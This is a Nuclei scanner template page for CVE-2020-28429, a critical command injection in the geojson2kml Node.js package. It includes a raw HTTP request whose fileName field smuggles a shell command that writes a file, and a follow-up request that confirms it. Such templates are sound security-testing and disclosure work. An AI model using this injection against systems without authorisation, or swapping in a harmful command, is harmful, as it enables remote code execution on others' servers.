geojson2kml - Command Injection

ID: CVE-2020-28429

Severity: critical

Author: eeche,chae1xx1os,persona-twotwo,soonghee2

Tags: cve,cve2020,rce,geojson2kml,file-upload,intrusive

Description

Detects command injection vulnerability by checking if hacked.txt is created and contains the expected content.

YAML Source

id: CVE-2020-28429

info:
  name: geojson2kml - Command Injection
  author: eeche,chae1xx1os,persona-twotwo,soonghee2
  severity: critical
  description: |
    Detects command injection vulnerability by checking if `hacked.txt` is created and contains the expected content.
  impact: |
    Successful exploitation of this vulnerability could result in unauthorized access, remote code execution, privilege escalation
  remediation: |
    Do not use geojson2kml. There is no fixed version for geojson2kml.
  reference:
    - https://snyk.io/vuln/SNYK-JS-GEOJSON2KML-1050412
    - https://github.com/advisories/GHSA-w83x-fp72-p9qc
    - https://nvd.nist.gov/vuln/detail/CVE-2020-28429
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2020-28429
    cwe-id: CWE-78
    epss-score: 0.01897
    epss-percentile: 0.8876
    cpe: cpe:2.3:a:geojson2kml_project:geojson2kml:*:*:*:*:*:node.js:*:*
  metadata:
    max-request: 1
    vendor: geojson2kml_project
    product: geojson2kml
    framework: node.js
  tags: cve,cve2020,rce,geojson2kml,file-upload,intrusive

variables:
  filename: '{{rand_base(6)}}'

http:
  - raw:
      - |
        POST /convert HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {
          "fileName": "& echo \"{{randstr}}\" > {{filename}}.txt && ls",
          "geoJsonData": {
            "type": "FeatureCollection",
            "features": [
              {
                "type": "Feature",
                "geometry": {
                  "type": "Point",
                  "coordinates": [102.0, 0.5]
                },
                "properties": {
                  "prop0": "value0"
                }
              }
            ]
          }
        }

      - |
        GET /file/{{filename}}.txt HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: word
        part: body_2
        words:
          - "{{randstr}}"

      - type: word
        part: header_2
        words:
          - "text/html"

      - type: status
        status:
          - 200
# digest: 4a0a0047304502204d1809fa7477857465d6379f094a7dc21aa70d3a22825cccdb2440d7384b5e1a022100be94e446821564043c082503c57d552a0153afce34d8ee72210621801592fa83:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

$ nuclei -u "URL" -t "http/cves/2020/CVE-2020-28429.yaml"

View on Github